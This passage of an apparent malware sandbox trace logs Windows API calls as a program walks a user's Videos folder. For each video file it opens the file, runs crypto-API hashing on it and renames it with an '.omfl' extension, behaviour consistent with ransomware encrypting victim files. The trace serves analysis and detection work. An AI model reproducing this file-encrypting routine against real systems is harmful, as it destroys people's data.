CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0134.162] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0134.162] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.162] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.162] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.162] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.163] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\hVIjhMbnyRCaiuu0qJ.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\hvijhmbnyrcaiuu0qj.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\hVIjhMbnyRCaiuu0qJ.swf.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\hvijhmbnyrcaiuu0qj.swf.omfl")) returned 1 [0134.164] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0134.164] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.164] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.166] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf8f0 | out: hHeap=0x4970000) returned 1 [0134.166] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e3777d0, ftCreationTime.dwHighDateTime=0x1d5d98e, ftLastAccessTime.dwLowDateTime=0xaac9eff0, ftLastAccessTime.dwHighDateTime=0x1d5df7b, ftLastWriteTime.dwLowDateTime=0xaac9eff0, ftLastWriteTime.dwHighDateTime=0x1d5df7b, nFileSizeHigh=0x0, nFileSizeLow=0x24eb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ICmA2FZyhE5.mp4", cAlternateFileName="ICMA2F~1.MP4")) returned 1 [0134.166] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\ICmA2FZyhE5.mp4") returned=".mp4" [0134.166] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\ICmA2FZyhE5.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\icma2fzyhe5.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.166] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=9451) returned 1 [0134.166] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.169] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0134.170] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.170] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.170] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.170] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.170] GetLastError () returned 0x0 [0134.170] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.170] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0134.170] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0134.170] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.171] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.171] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.171] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.171] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\ICmA2FZyhE5.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\icma2fzyhe5.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\ICmA2FZyhE5.mp4.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\icma2fzyhe5.mp4.omfl")) returned 1 [0134.172] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0134.172] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.172] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.173] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf8f0 | out: hHeap=0x4970000) returned 1 [0134.173] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc32b6910, ftCreationTime.dwHighDateTime=0x1d5da18, ftLastAccessTime.dwLowDateTime=0x70e757f0, ftLastAccessTime.dwHighDateTime=0x1d5e5f7, ftLastWriteTime.dwLowDateTime=0x70e757f0, ftLastWriteTime.dwHighDateTime=0x1d5e5f7, nFileSizeHigh=0x0, nFileSizeLow=0x18b6e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kdB NCnTqU.mkv", cAlternateFileName="KDBNCN~1.MKV")) returned 1 [0134.173] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\kdB NCnTqU.mkv") returned=".mkv" [0134.173] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\kdB NCnTqU.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\kdb ncntqu.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.174] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=101230) returned 1 [0134.174] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.177] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0134.178] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.178] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.178] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.179] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.179] GetLastError () returned 0x0 [0134.179] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.179] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0134.179] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0134.179] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.179] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.179] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.179] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.180] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\kdB NCnTqU.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\kdb ncntqu.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\kdB NCnTqU.mkv.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\kdb ncntqu.mkv.omfl")) returned 1 [0134.181] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0134.181] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.181] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.183] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf8f0 | out: hHeap=0x4970000) returned 1 [0134.183] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5026bed0, ftCreationTime.dwHighDateTime=0x1d5da6b, ftLastAccessTime.dwLowDateTime=0xc00c6300, ftLastAccessTime.dwHighDateTime=0x1d5db0e, ftLastWriteTime.dwLowDateTime=0xc00c6300, ftLastWriteTime.dwHighDateTime=0x1d5db0e, nFileSizeHigh=0x0, nFileSizeLow=0xd8da, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LP8Xare9fqxd50MhmW5_.flv", cAlternateFileName="LP8XAR~1.FLV")) returned 1 [0134.183] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\LP8Xare9fqxd50MhmW5_.flv") returned=".flv" [0134.183] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\LP8Xare9fqxd50MhmW5_.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\lp8xare9fqxd50mhmw5_.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.183] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=55514) returned 1 [0134.183] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.187] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0134.188] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.188] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.188] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.188] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.188] GetLastError () returned 0x0 [0134.188] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.188] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0134.188] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0134.188] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.188] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.188] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.188] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.189] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\LP8Xare9fqxd50MhmW5_.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\lp8xare9fqxd50mhmw5_.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\LP8Xare9fqxd50MhmW5_.flv.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\lp8xare9fqxd50mhmw5_.flv.omfl")) returned 1 [0134.190] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0134.190] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.190] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.191] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf8f0 | out: hHeap=0x4970000) returned 1 [0134.191] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15aad970, ftCreationTime.dwHighDateTime=0x1d5d896, ftLastAccessTime.dwLowDateTime=0x505a8360, ftLastAccessTime.dwHighDateTime=0x1d5d7d6, ftLastWriteTime.dwLowDateTime=0x505a8360, ftLastWriteTime.dwHighDateTime=0x1d5d7d6, nFileSizeHigh=0x0, nFileSizeLow=0x3786, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NZ2evMlhb_VT_6u.swf", cAlternateFileName="NZ2EVM~1.SWF")) returned 1 [0134.192] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\NZ2evMlhb_VT_6u.swf") returned=".swf" [0134.192] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\NZ2evMlhb_VT_6u.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\nz2evmlhb_vt_6u.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.192] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=14214) returned 1 [0134.192] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.195] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0134.196] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.196] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.196] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.196] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.196] GetLastError () returned 0x0 [0134.196] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.196] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0134.196] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0134.196] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.196] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.197] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.197] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.197] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\NZ2evMlhb_VT_6u.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\nz2evmlhb_vt_6u.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\NZ2evMlhb_VT_6u.swf.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\nz2evmlhb_vt_6u.swf.omfl")) returned 1 [0134.198] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0134.198] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.198] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.200] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf8f0 | out: hHeap=0x4970000) returned 1 [0134.200] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b3d53e0, ftCreationTime.dwHighDateTime=0x1d5dfb8, ftLastAccessTime.dwLowDateTime=0xf5d363d0, ftLastAccessTime.dwHighDateTime=0x1d5e59f, ftLastWriteTime.dwLowDateTime=0xf5d363d0, ftLastWriteTime.dwHighDateTime=0x1d5e59f, nFileSizeHigh=0x0, nFileSizeLow=0x1541a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oEOceShUUWWsoMXbs3G.swf", cAlternateFileName="OEOCES~1.SWF")) returned 1 [0134.200] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\oEOceShUUWWsoMXbs3G.swf") returned=".swf" [0134.200] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\oEOceShUUWWsoMXbs3G.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\oeoceshuuwwsomxbs3g.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.200] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=87066) returned 1 [0134.200] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.204] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0134.205] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.205] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.205] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.205] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.205] GetLastError () returned 0x0 [0134.205] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.205] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0134.205] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0134.205] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.205] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.205] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.205] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.207] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\oEOceShUUWWsoMXbs3G.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\oeoceshuuwwsomxbs3g.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\oEOceShUUWWsoMXbs3G.swf.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\oeoceshuuwwsomxbs3g.swf.omfl")) returned 1 [0134.207] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0134.207] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.207] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.209] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf8f0 | out: hHeap=0x4970000) returned 1 [0134.209] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f109580, ftCreationTime.dwHighDateTime=0x1d5e3cf, ftLastAccessTime.dwLowDateTime=0xe90b7b00, ftLastAccessTime.dwHighDateTime=0x1d5e591, ftLastWriteTime.dwLowDateTime=0xe90b7b00, ftLastWriteTime.dwHighDateTime=0x1d5e591, nFileSizeHigh=0x0, nFileSizeLow=0x6356, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QPV_vesFyJLSe4O.mp4", cAlternateFileName="QPV_VE~1.MP4")) returned 1 [0134.209] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\QPV_vesFyJLSe4O.mp4") returned=".mp4" [0134.209] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\QPV_vesFyJLSe4O.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\qpv_vesfyjlse4o.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.209] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=25430) returned 1 [0134.209] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.212] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0134.213] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.213] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.213] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.213] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.213] GetLastError () returned 0x0 [0134.213] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.213] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0134.214] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0134.214] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.214] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.214] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.214] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.214] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\QPV_vesFyJLSe4O.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\qpv_vesfyjlse4o.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\QPV_vesFyJLSe4O.mp4.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\qpv_vesfyjlse4o.mp4.omfl")) returned 1 [0134.216] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\Rj Apxnq n-5.flv") returned=".flv" [0134.216] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\Rj Apxnq n-5.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\rj apxnq n-5.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.216] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=80630) returned 1 [0134.216] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.220] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0134.221] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.221] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.221] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.221] 